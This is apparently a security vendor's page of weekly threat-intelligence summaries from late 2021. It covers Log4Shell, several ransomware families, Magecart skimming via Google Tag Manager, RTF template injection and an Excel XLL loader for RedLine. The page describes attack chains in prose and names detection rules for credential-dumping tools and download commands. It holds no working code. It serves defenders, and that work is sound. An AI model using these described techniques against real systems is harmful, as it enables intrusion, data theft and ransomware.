The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

Khonsari Ransomware & Log4Shell

December 21, 2021

Khonsari Ransomware & Log4Shell

Industry: N/A | Level: Tactical | Source: CadoSecurity

Ransomware family – Khonsari has been observed utilizing CVE-2021-44228/Log4Shell vulnerability targeting Windows servers.  The malware executable “groenhuyzen.exe” is dropped and exploits the JNDI class. The malware’s functionality is straightforward at only 12 KB, it’ll enumerate and encrypt (with extension – .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted including Documents, Videos, Pictures, Downloads, and Desktop.

  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

CVE-2021-44228 / Log4Shell Vulnerability

December 10, 2021

CVE-2021-44228 / Log4Shell Vulnerability

Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List

A zero-day exploit has been identified for Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1 with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.

The exploit requires three components a vulnerable log4j version, any protocol that enables the attack to send the exploit string, and a log statement that can log the string from the request.

Mitigation is available through an update with affected users recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats Kinsing (cryptocurrency miner), Mirai Malware, Cobalt Strike, a new unidentified ransomware strain, and likely others, yet to be identified, taking advantage of the widespread vulnerability.

Magecart Abuses Google Tag Manager

December 01, 2021

Magecart Abuses Google Tag Manager

Industry: eCommerce | Level: Strategic | Source: GeminiAdvisory

The Magecart threat actor group has abused the Google Tag Manager (GTM) service by discriminately adding malicious JavaScripts within the GTM container. The GTM service was intended to allow web authors the capability to update measurement codes and other code fragments. Abused GTM containers execute the embedded JavaScript when a browser loads the link to a container, collecting unsuspected buyer information through the use of additional payment forms and exfiltrate the data to a remote collection server. These findings are reported by Gemini Advisory a Recorded Future company, who has been observing the threat since February 4th, 2021. Three hundred and sixteen ecommerce sites were compromised with infected containers, resulting in at least 88,000 payment card records posted for sale on dark web markets.

ANSSI Alerts of Nobelium Targeting French Organizations

December 01, 2021

ANSSI Alerts of Nobelium Targeting French Organizations

Industry: Diplomatic | Level: Strategic | Source: ANSSI

French national cyber-security agency, ANSSI, raised an alert detailing Nobelium phishing campaigns directed at French entities. The campaign observation began in February 2021 with noticed escalation in May. The French email accounts are compromised and then used to send weaponized emails to foreign institutions in the diplomatic sector. The threat group is utilizing various hosting methods, mainly OVH SAS, Hydra Communications Ltd, M247 Ltd and 12 additional observed hosting providers.

NSO Spyware Compromises US State Department Employees’ Phones

December 01, 2021

NSO Spyware Compromises US State Department Employees’ Phones

Industry: Government | Level: Strategic | Source: Reuters

Apple Inc. has informed at least nine, US Department of State employees, their iPhones had been compromised due to NSO Pegasus spyware. Impacted officials were all either based in Uganda or focused on matters concerning the East African country, as shared by two Reuters sources. The compromises occurred within the last several months.

RTF Template Injection

December 01, 2021

RTF Template Injection

Industry: Energy (Deepwater) & Government | Level: Tactical | Source: ProofPoint

Proofpoint has observed increased usage of RTF template injections from threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021 with files publicly identified on April 5th. The template injections enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique. APT group DoNot Team and TA423 are both associated with targeting Malaysia’s Deepwater energy exploration, while APT actor, Gamaredon, targeted the Ukrainian government.

  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Abuse EQNEDT32.EXE CVE-2017-11882

Microsoft Excel (XLL) Leads to RedLine Info-Stealer

December 01, 2021

Microsoft Excel (XLL) Leads to RedLine Info-Stealer

Industry: N/A | Level: Tactical | Source: BleepingComputer

Threat Actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install RedLine information stealer. Malicious links are hosted on Google Drive and download a XLL which BleepingComputer describes as, “an an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32 that extracts the wget.exe program to download the RedLine binary saving it as %UserProfile%\JavaBridge32.exe. Once downloaded an autorun registry entry will launch and enable persistence for the malware.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • regsvr32 Execution
    • Rundll32 Command Line
    • Invoke-WebRequest Command

Yanluowang Ransomware Linked to Thieflock Affiliate

December 01, 2021

Yanluowang Ransomware Linked to Thieflock Affiliate

Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec

Yanluowang ransomware group, active since at least August 2021, have been targeting US Corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Theiflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances from Thieflock to the Yanluowang ransomware family. Notable noticed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, Adfind for reconnaissance, and the usage of other various credential-stealing tools.

  • Anvilogic Scenario: Yanluowang Ransomware – Behaviors
  • Anvilogic Use Cases:
    • RDP Enabled
    • Adfind Execution
    • pypykatz commands

BlackByte Ransomware from RedCanary

December 01, 2021

BlackByte Ransomware from RedCanary

Industry: N/A | Level: Tactical | Source: RedCanary

RedCanary presented research from a BlackByte ransomware incident response engagement with Kroll. The attack sequence covered initial access from ProxyShell and web shell through post-exploitation with cobalt strike, impairing defenses with process monitoring, windows defender, and firewall modifications to ransomware and file exfiltration.

  • Anvilogic Scenario: BlackByte Behaviors

Cuba Ransomware

December 01, 2021

Cuba Ransomware

Industry: Critical Infrastructure | Level: Tactical | Source: FBI

The FBI released a flash report for Cuba ransomware based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to, financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to the Cuba ransomware. Threat actors utilize phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. Many legitimate Windows services are employed by the threat actors as well such as PowerShell, PsExec, in addition to leveraging Windows Admin privileges to execute their ransomware.

  • Anvilogic Scenario: Hancitor & Cuba Ransomware
  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • PSexec Service Creation
    • Remote Admin Tools